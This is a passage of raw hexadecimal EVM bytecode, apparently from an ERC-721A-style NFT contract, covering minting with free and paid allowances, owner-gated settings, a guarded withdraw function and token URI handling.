6038101906106589190613f50565b611918565b60405161066a919061461e565b60405180910390f35b34801561067f57600080fd5b50610688611938565b60405161069591906145b7565b60405180910390f35b3480156106aa57600080fd5b506106c560048036038101906106c09190613f50565b611962565b6040516106d2919061461e565b60405180910390f35b3480156106e757600080fd5b5061070260048036038101906106fd9190613f50565b611982565b005b34801561071057600080fd5b50610719611a67565b6040516107269190614639565b60405180910390f35b34801561073b57600080fd5b5061075660048036038101906107519190613e6d565b611af9565b005b34801561076457600080fd5b5061076d611be2565b60405161077a9190614a5b565b60405180910390f35b61079d60048036038101906107989190613f50565b611be8565b005b3480156107ab57600080fd5b506107c660048036038101906107c19190613f07565b612261565b005b3480156107d457600080fd5b506107ef60048036038101906107ea9190613e2d565b612356565b005b3480156107fd57600080fd5b506108066124d7565b6040516108139190614a5b565b60405180910390f35b34801561082857600080fd5b50610843600480360381019061083e9190613f7d565b6124e1565b005b34801561085157600080fd5b5061086c60048036038101906108679190613daa565b612664565b005b34801561087a57600080fd5b506108836126c0565b6040516108909190614a5b565b60405180910390f35b3480156108a557600080fd5b506108ae6126c6565b6040516108bb9190614a5b565b60405180910390f35b3480156108d057600080fd5b506108eb60048036038101906108e69190613f50565b6126cc565b6040516108f89190614639565b60405180910390f35b34801561090d57600080fd5b5061091661277f565b604051610923919061461e565b60405180910390f35b34801561093857600080fd5b50610941612792565b60405161094e9190614a5b565b60405180910390f35b34801561096357600080fd5b5061096c612798565b6040516109799190614a5b565b60405180910390f35b34801561098e57600080fd5b506109a960048036038101906109a49190613f50565b61279e565b005b3480156109b757600080fd5b506109d260048036038101906109cd9190613d17565b612883565b6040516109df919061461e565b60405180910390f35b3480156109f457600080fd5b50610a0f6004803603810190610a0a9190613cea565b612917565b005b348015610a1d57600080fd5b50610a386004803603810190610a339190613cea565b612a6e565b604051610a459190614a5b565b60405180910390f35b348015610a5a57600080fd5b50610a63612a86565b604051610a709190614a5b565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480610b4457507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610bac57507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610bbc5750610bbb82612a8c565b5b9050919050565b606060018054610bd290614d16565b80601f0160208091040260200160405190810160405280929190818152602001828054610bfe90614d16565b8015610c4b5780601f10610c2057610100808354040283529160200191610c4b565b820191906000526020600020905b815481529060010190602001808311610c2e57829003601f168201915b5050505050905090565b6000610c6082612af6565b610c9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c9690614a3b565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610ce582611593565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d56576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4d906148fb565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610d75612b03565b73ffffffffffffffffffffffffffffffffffffffff161480610da45750610da381610d9e612b03565b612883565b5b610de3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dda9061479b565b60405180910390fd5b610dee838383612b0b565b505050565b60156020528060005260406000206000915090505481565b60008054905090565b610e1f838383612bbd565b505050565b6000610e2f83611641565b8210610e70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e679061465b565b60405180910390fd5b6000610e7a610e0b565b905060008060005b83811015610fd4576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610f7457806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610fc65786841415610fbd578195505050505050611010565b83806001019450505b508080600101915050610e82565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611007906149db565b60405180910390fd5b92915050565b600f5481565b611024612b03565b73ffffffffffffffffffffffffffffffffffffffff16611042611938565b73ffffffffffffffffffffffffffffffffffffffff1614806110b85750611067612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6110f7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ee9061485b565b60405180910390fd5b6002600954141561113d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611134906149fb565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff164760405161116b906145a2565b60006040518083038185875af1925050503d80600081146111a8576040519150601f19603f3d011682016040523d82523d6000602084013e6111ad565b606091505b50509050806111f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111e89061491b565b60405180910390fd5b506001600981905550565b61121783838360405180602001604052806000815250612664565b505050565b600e5481565b600061122c610e0b565b821061126d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112649061475b565b60405180910390fd5b819050919050565b3373ffffffffffffffffffffffffffffffffffffffff1661129583611593565b73ffffffffffffffffffffffffffffffffffffffff16146112eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112e29061471b565b60405180910390fd5b6000600a836112fa9190614dc2565b1461133a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113319061481b565b60405180910390fd5b6000600a826113499190614dc2565b141561138a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113819061467b565b60405180910390fd5b6016600082815260200190815260200160002060009054906101000a900460ff16156113e2576040517f0dc1019700000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6017600083815260200190815260200160002060009054906101000a900460ff161561143a576040517f0dc1019700000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60016016600083815260200190815260200160002060006101000a81548160ff02191690831515021790555060016017600084815260200190815260200160002060006101000a81548160ff021916908315150217905550601360008154809291906114a590614d79565b91905055505050565b6114b6612b03565b73ffffffffffffffffffffffffffffffffffffffff166114d4611938565b73ffffffffffffffffffffffffffffffffffffffff16148061154a57506114f9612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611589576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115809061485b565b60405180910390fd5b80600f8190555050565b600061159e826130fd565b600001519050919050565b6000600b54905090565b600a80546115c090614d16565b80601f01602080910402602001604051908101604052809291908181526020018280546115ec90614d16565b80156116395780601f1061160e57610100808354040283529160200191611639565b820191906000526020600020905b81548152906001019060200180831161161c57829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156116b2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116a9906147bb565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b611732612b03565b73ffffffffffffffffffffffffffffffffffffffff16611750611938565b73ffffffffffffffffffffffffffffffffffffffff1614806117c65750611775612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611805576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117fc9061485b565b60405180910390fd5b61180f6000613297565b565b611819612b03565b73ffffffffffffffffffffffffffffffffffffffff16611837611938565b73ffffffffffffffffffffffffffffffffffffffff1614806118ad575061185c612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6118ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118e39061485b565b60405180910390fd5b601160009054906101000a900460ff1615601160006101000a81548160ff021916908315150217905550565b60176020528060005260406000206000915054906101000a900460ff1681565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60166020528060005260406000206000915054906101000a900460ff1681565b61198a612b03565b73ffffffffffffffffffffffffffffffffffffffff166119a8611938565b73ffffffffffffffffffffffffffffffffffffffff161480611a1e57506119cd612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611a5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a549061485b565b60405180910390fd5b80600b8190555050565b606060028054611a7690614d16565b80601f0160208091040260200160405190810160405280929190818152602001828054611aa290614d16565b8015611aef5780601f10611ac457610100808354040283529160200191611aef565b820191906000526020600020905b815481529060010190602001808311611ad257829003601f168201915b5050505050905090565b611b01612b03565b73ffffffffffffffffffffffffffffffffffffffff16611b1f611938565b73ffffffffffffffffffffffffffffffffffffffff161480611b955750611b44612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611bd4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bcb9061485b565b60405180910390fd5b611bde828261335d565b5050565b600b5481565b6000600b54905060006001600f54611c009190614b4b565b83601254611c0e9190614b4b565b108015611c5b5750600d54601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b90508015611fc557601160009054906101000a900460ff16611cb2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ca99061469b565b60405180910390fd5b60105483611cbe610e0b565b611cc89190614b4b565b1115611d09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d00906146bb565b60405180910390fd5b600c54831115611d4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d45906149bb565b60405180910390fd5b601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611d9b9190614c2c565b8310611eb75781601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611def9190614c2c565b611df99190614bd2565b8284611e059190614bd2565b611e0f9190614c2c565b341015611e51576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e48906147db565b60405180910390fd5b600d54601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600d5460126000828254611eab9190614b4b565b92505081905550611fc0565b601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611f049190614c2c565b831015611fbf576000341015611f4f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f46906147db565b60405180910390fd5b82601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611f9e9190614b4b565b925050819055508260126000828254611fb79190614b4b565b925050819055505b5b6121fc565b601160009054906101000a900460ff16612014576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200b9061469b565b60405180910390fd5b600e5483601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546120629190614b4b565b11156120a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161209a906148db565b60405180910390fd5b81836120af9190614bd2565b3410156120f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120e8906147db565b60405180910390fd5b601054836120fd610e0b565b6121079190614b4b565b1115612148576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161213f906146bb565b60405180910390fd5b600c5483111561218d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612184906149bb565b60405180910390fd5b3273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146121fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121f2906146fb565b60405180910390fd5b5b82601560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461224b9190614b4b565b9250508190555061225c338461335d565b505050565b612269612b03565b73ffffffffffffffffffffffffffffffffffffffff16612287611938565b73ffffffffffffffffffffffffffffffffffffffff1614806122fd57506122ac612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61233c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123339061485b565b60405180910390fd5b80600a9080519060200190612352929190613ac4565b5050565b61235e612b03565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156123cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123c39061489b565b60405180910390fd5b80600660006123d9612b03565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16612486612b03565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31836040516124cb919061461e565b60405180910390a35050565b6000600d54905090565b6124e9612b03565b73ffffffffffffffffffffffffffffffffffffffff16612507611938565b73ffffffffffffffffffffffffffffffffffffffff16148061257d575061252c612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6125bc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125b39061485b565b60405180910390fd5b600082116125ff576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125f69061495b565b60405180910390fd5b6010548261260b610e0b565b6126159190614b4b565b1115612656576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161264d906147fb565b60405180910390fd5b612660818361335d565b5050565b61266f848484612bbd565b61267b8484848461337b565b6126ba576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126b19061493b565b60405180910390fd5b50505050565b60135481565b600d5481565b60606126d782612af6565b612716576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161270d9061487b565b60405180910390fd5b6000612720613512565b905060008151116127405760405180602001604052806000815250612777565b806127566001856127519190614b4b565b6135a4565b604051602001612767929190614573565b6040516020818303038152906040525b915050919050565b601160009054906101000a900460ff1681565b60105481565b60125481565b6127a6612b03565b73ffffffffffffffffffffffffffffffffffffffff166127c4611938565b73ffffffffffffffffffffffffffffffffffffffff16148061283a57506127e9612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b612879576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016128709061485b565b60405180910390fd5b80600d8190555050565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b61291f612b03565b73ffffffffffffffffffffffffffffffffffffffff1661293d611938565b73ffffffffffffffffffffffffffffffffffffffff1614806129b35750612962612b03565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6129f2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016129e99061485b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415612a62576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a59906146db565b60405180910390fd5b612a6b81613297565b50565b60146020528060005260406000206000915090505481565b600c5481565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b6000805482109050919050565b600033905090565b826005600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b6000612bc8826130fd565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff16612bef612b03565b73ffffffffffffffffffffffffffffffffffffffff161480612c4b5750612c14612b03565b73ffffffffffffffffffffffffffffffffffffffff16612c3384610c55565b73ffffffffffffffffffffffffffffffffffffffff16145b80612c675750612c668260000151612c61612b03565b612883565b5b905080612ca9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612ca0906148bb565b60405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff1614612d1b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d129061483b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415612d8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d829061477b565b60405180910390fd5b612d988585856001613705565b612da86000848460000151612b0b565b6001600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160392506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff1602179055506001600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550836003600085815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600085815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000600184019050600073ffffffffffffffffffffffffffffffffffffffff166003600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16141561308d57612fec81612af6565b1561308c5782600001516003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555082602001516003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46130f6858585600161370b565b5050505050565b613105613b4a565b61310e82612af6565b61314d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016131449061473b565b60405180910390fd5b60008290505b60008110613256576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614613247578092505050613292565b50808060019003915050613153565b506040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161328990614a1b565b60405180910390fd5b919050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b613377828260405180602001604052806000815250613711565b5050565b600061339c8473ffffffffffffffffffffffffffffffffffffffff16613723565b15613505578373ffffffffffffffffffffffffffffffffffffffff1663150b7a026133c5612b03565b8786866040518563ffffffff1660e01b81526004016133e794939291906145d2565b602060405180830381600087803b15801561340157600080fd5b505af192505050801561343257506040513d601f19601f8201168201806040525081019061342f9190613eda565b60015b6134b5573d8060008114613462576040519150601f19603f3d011682016040523d82523d6000602084013e613467565b606091505b506000815114156134ad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016134a49061493b565b60405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161491505061350a565b600190505b949350505050565b6060600a805461352190614d16565b80601f016020809104026020016040519081016040528092919081815260200182805461354d90614d16565b801561359a5780601f1061356f5761010080835404028352916020019161359a565b820191906000526020600020905b81548152906001019060200180831161357d57829003601f168201915b5050505050905090565b606060008214156135ec576040518060400160405280600181526020017f30000000000000000000000000000000000000000000000000000000000000008152509050613700565b600082905060005b6000821461361e57808061360790614d79565b915050600a826136179190614ba1565b91506135f4565b60008167ffffffffffffffff81111561363a57613639614eaf565b5b6040519080825280601f01601f19166020018201604052801561366c5781602001600182028036833780820191505090505b5090505b600085146136f9576001826136859190614c2c565b9150600a856136949190614dc2565b60306136a09190614b4b565b60f81b8183815181106136b6576136b5614e80565b5b60200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350600a856136f29190614ba1565b9450613670565b8093505050505b919050565b50505050565b50505050565b61371e8383836001613746565b505050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b600080549050600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614156137bc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137b39061497b565b60405180910390fd5b6000841415613800576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137f79061499b565b60405180910390fd5b61380d6000868387613705565b83600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff16021790555083600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160108282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550846003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600081905060005b85811015613aa757818773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a48315613a9257613a52600088848861337b565b613a91576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613a889061493b565b60405180910390fd5b5b818060010192505080806001019150506139db565b508060008190555050613abd600086838761370b565b5050505050565b828054613ad090614d16565b90600052602060002090601f016020900481019282613af25760008555613b39565b82601f10613b0b57805160ff1916838001178555613b39565b82800160010185558215613b39579182015b82811115613b38578251825591602001919060010190613b1d565b5b509050613b469190613b84565b5090565b6040518060400160405280600073ffffffffffffffffffffffffffffffffffffffff168152602001600067ffffffffffffffff1681525090565b5b80821115613b9d576000816000905550600101613b85565b5090565b6000613bb4613baf84614a9b565b614a76565b905082815260208101848484011115613bd057613bcf614ee3565b5b613bdb848285614cd4565b509392505050565b6000613bf6613bf184614acc565b614a76565b905082815260208101848484011115613c1257613c11614ee3565b5b613c1d848285614cd4565b509392505050565b600081359050613c3481615721565b92915050565b600081359050613c4981615738565b92915050565b600081359050613c5e8161574f565b92915050565b600081519050613c738161574f565b92915050565b600082601f830112613c8e57613c8d614ede565b5b8135613c9e848260208601613ba1565b91505092915050565b600082601f830112613cbc57613cbb614ede565b5b8135613ccc848260208601613be3565b91505092915050565b600081359050613ce481615766565b92915050565b600060208284031215613d0057613cff614eed565b5b6000613d0e84828501613c25565b91505092915050565b60008060408385031215613d2e57613d2d614eed565b5b6000613d3c85828601613c25565b9250506020613d4d85828601613c25565b9150509250929050565b600080600060608486031215613d7057613d6f614eed565b5b6000613d7e86828701613c25565b9350506020613d8f86828701613c25565b9250506040613da086828701613cd5565b9150509250925092565b60008060008060808587031215613dc457613dc3614eed565b5b6000613dd287828801613c25565b9450506020613de387828801613c25565b9350506040613df487828801613cd5565b925050606085013567ffffffffffffffff811115613e1557613e14614ee8565b5b613e2187828801613c79565b91505092959194509250565b60008060408385031215613e4457613e43614eed565b5b6000613e5285828601613c25565b9250506020613e6385828601613c3a565b9150509250929050565b60008060408385031215613e8457613e83614eed565b5b6000613e9285828601613c25565b9250506020613ea385828601613cd5565b9150509250929050565b600060208284031215613ec357613ec2614eed565b5b6000613ed184828501613c4f565b91505092915050565b600060208284031215613ef057613eef614eed565b5b6000613efe84828501613c64565b91505092915050565b600060208284031215613f1d57613f1c614eed565b5b600082013567ffffffffffffffff811115613f3b57613f3a614ee8565b5b613f4784828501613ca7565b91505092915050565b600060208284031215613f6657613f65614eed565b5b6000613f7484828501613cd5565b91505092915050565b60008060408385031215613f9457613f93614eed565b5b6000613fa285828601613cd5565b9250506020613fb385828601613c25565b9150509250929050565b60008060408385031215613fd457613fd3614eed565b5b6000613fe285828601613cd5565b9250506020613ff385828601613cd5565b9150509250929050565b61400681614c60565b82525050565b61401581614c72565b82525050565b600061402682614afd565b6140308185614b13565b9350614040818560208601614ce3565b61404981614ef2565b840191505092915050565b600061405f82614b08565b6140698185614b2f565b9350614079818560208601614ce3565b61408281614ef2565b840191505092915050565b600061409882614b08565b6140a28185614b40565b93506140b2818560208601614ce3565b80840191505092915050565b60006140cb602283614b2f565b91506140d682614f03565b604082019050919050565b60006140ee602483614b2f565b91506140f982614f52565b604082019050919050565b6000614111601483614b2f565b915061411c82614fa1565b602082019050919050565b6000614134600783614b2f565b915061413f82614fca565b602082019050919050565b6000614157602683614b2f565b915061416282614ff3565b604082019050919050565b600061417a601e83614b2f565b915061418582615042565b602082019050919050565b600061419d601483614b2f565b91506141a88261506b565b602082019050919050565b60006141c0602a83614b2f565b91506141cb82615094565b604082019050919050565b60006141e3602383614b2f565b91506141ee826150e3565b604082019050919050565b6000614206602583614b2f565b915061421182615132565b604082019050919050565b6000614229603983614b2f565b915061423482615181565b604082019050919050565b600061424c602b83614b2f565b9150614257826151d0565b604082019050919050565b600061426f602083614b2f565b915061427a8261521f565b602082019050919050565b6000614292601783614b2f565b915061429d82615248565b602082019050919050565b60006142b5602383614b2f565b91506142c082615271565b604082019050919050565b60006142d8602683614b2f565b91506142e3826152c0565b604082019050919050565b60006142fb600583614b40565b91506143068261530f565b600582019050919050565b600061431e602083614b2f565b915061432982615338565b602082019050919050565b6000614341602f83614b2f565b915061434c82615361565b604082019050919050565b6000614364601a83614b2f565b915061436f826153b0565b602082019050919050565b6000614387603283614b2f565b9150614392826153d9565b604082019050919050565b60006143aa601e83614b2f565b91506143b582615428565b602082019050919050565b60006143cd602283614b2f565b91506143d882615451565b604082019050919050565b60006143f0600083614b24565b91506143fb826154a0565b600082019050919050565b6000614413601083614b2f565b915061441e826154a3565b602082019050919050565b6000614436603383614b2f565b9150614441826154cc565b604082019050919050565b6000614459601383614b2f565b91506144648261551b565b602082019050919050565b600061447c602183614b2f565b915061448782615544565b604082019050919050565b600061449f602883614b2f565b91506144aa82615593565b604082019050919050565b60006144c2601383614b2f565b91506144cd826155e2565b602082019050919050565b60006144e5602e83614b2f565b91506144f08261560b565b604082019050919050565b6000614508601f83614b2f565b91506145138261565a565b602082019050919050565b600061452b602f83614b2f565b915061453682615683565b604082019050919050565b600061454e602d83614b2f565b9150614559826156d2565b604082019050919050565b61456d81614cca565b82525050565b600061457f828561408d565b915061458b828461408d565b9150614596826142ee565b91508190509392505050565b60006145ad826143e3565b9150819050919050565b60006020820190506145cc6000830184613ffd565b92915050565b60006080820190506145e76000830187613ffd565b6145f46020830186613ffd565b6146016040830185614564565b8181036060830152614613818461401b565b905095945050505050565b6000602082019050614633600083018461400c565b92915050565b600060208201905081810360008301526146538184614054565b905092915050565b60006020820190508181036000830152614674816140be565b9050919050565b60006020820190508181036000830152614694816140e1565b9050919050565b600060208201905081810360008301526146b481614104565b9050919050565b600060208201905081810360008301526146d481614127565b9050919050565b600060208201905081810360008301526146f48161414a565b9050919050565b600060208201905081810360008301526147148161416d565b9050919050565b6000602082019050818103600083015261473481614190565b9050919050565b60006020820190508181036000830152614754816141b3565b9050919050565b60006020820190508181036000830152614774816141d6565b9050919050565b60006020820190508181036000830152614794816141f9565b9050919050565b600060208201905081810360008301526147b48161421c565b9050919050565b600060208201905081810360008301526147d48161423f565b9050919050565b600060208201905081810360008301526147f481614262565b9050919050565b6000602082019050818103600083015261481481614285565b9050919050565b60006020820190508181036000830152614834816142a8565b9050919050565b60006020820190508181036000830152614854816142cb